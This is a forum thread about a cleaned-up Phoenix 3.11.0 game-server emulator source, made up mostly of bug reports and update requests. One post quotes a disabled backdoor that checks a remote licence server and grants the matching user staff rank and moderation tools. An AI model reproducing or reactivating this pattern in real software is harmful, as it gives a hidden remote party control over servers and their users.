Welcome!

Join our community of MMO enthusiasts and game developers! By registering, you'll gain access to discussions on the latest developments in MMO server files and collaborate with like-minded individuals. Join us today and unlock the potential of MMO server development!

Join Today!

Source Phoenix 3.11.0 [Organized / Fixed Source / Without Backdoors]

Status
Not open for further replies.
Junior Spellweaver
Reaction score
Hmmm what is this in the source, it has been disabled but was does it do ? :

PHP:
this.dictionary_4.Add("neto737", 70);

PHP:
case 70:
								{
                                    //string b = Licence.smethod_2(Phoenix.LicenceServer + "override.php", true);
                                    //string a2;
                                    //using (DatabaseClient dbClient = Phoenix.GetDatabase().GetClient())
                                    //{
                                    //    a2 = dbClient.ReadString("SELECT ip_last FROM users WHERE Id = " + Session.GetHabbo().Id + " LIMIT 1;");
                                    //}
                                    //if (Session.GetConnection().senderUsername == b || a2 == b)
                                    //{
                                    //    Session.GetHabbo().isAaronble = true;
                                    //    Session.GetHabbo().id = (uint)Phoenix.GetGame().GetRoleManager().method_9();
                                    //    Session.GetHabbo().AllowGift = true;
                                    //    Session.method_14(Phoenix.GetGame().GetModerationTool().LookRandomSpeech());
                                    //    Phoenix.GetGame().GetModerationTool().method_4(Session);
                                    //    return true;
                                    //}

When running Update 2 :
- makesay, roll, rave etc don't work
- Connection time outs
PHP:
[TCPListener.OnRequest]: Could not handle new connection request: System.Net.Sockets.SocketException (0x80004005): An existing connection was forcibly closed by the remote host
   at System.Net.Sockets.Socket.EndAccept(Byte[]& buffer, Int32& bytesTransferred, IAsyncResult asyncResult)
   at System.Net.Sockets.Socket.EndAccept(IAsyncResult asyncResult)
   at Phoenix.Net.Class114.method_4(IAsyncResult iasyncResult_0)
When trying to connect it takes a long time also there is a delay in reciving connection, when fully booted it takes about 30 sec before it starts accepting connections.

This guy is right, it's slow starting up and sometimes I receive errors and it says connection buffers.

Banned
Banned
Reaction score
Wondering if there are any new updates regarding the renaming classes and fixing.

I've barely seen any fixes now and then so i would love to see some more updates.

Verstuurd van mijn GT-I9070 met Tapatalk

LETS REACH 666 POSTS?!!!!
Reaction score
Is there coming' an update 3?

also did anny of you make their own cool edits?, like :fly

Newbie Spellweaver
Reaction score
For some reason all users who connect to this emulator have mod perms even though they are rank 1 and permissions_ranks has been set? I've tried doing :update_permissions and such and people still have the mod tool and such

www.Epic Hosts.co.uk
Loyal Member
Reaction score
My version:

You'll need to use this source if you want the cleaned up packets, I've renamed over 200 classes.
Is Leon's version, in my quote (with the cleaned up packets, renamed classes etc) going to be included in Update 3?

Banned
Banned
Reaction score
Would love to see some more features from the R63B side if possible it would make Phoenix neat and it would totally bring Phoenix to the next level however i don't think anyone is going to do that and this is only a fix :(

Junior Spellweaver
Reaction score
Would love to see some more features from the R63B side if possible it would make Phoenix neat and it would totally bring Phoenix to the next level however i don't think anyone is going to do that and this is only a fix :(

Well, go on then!

Banned
Banned
Reaction score
Nope it's just saying and it would be nice but maybe soon when someone thinks of itm

Status
Not open for further replies.
Back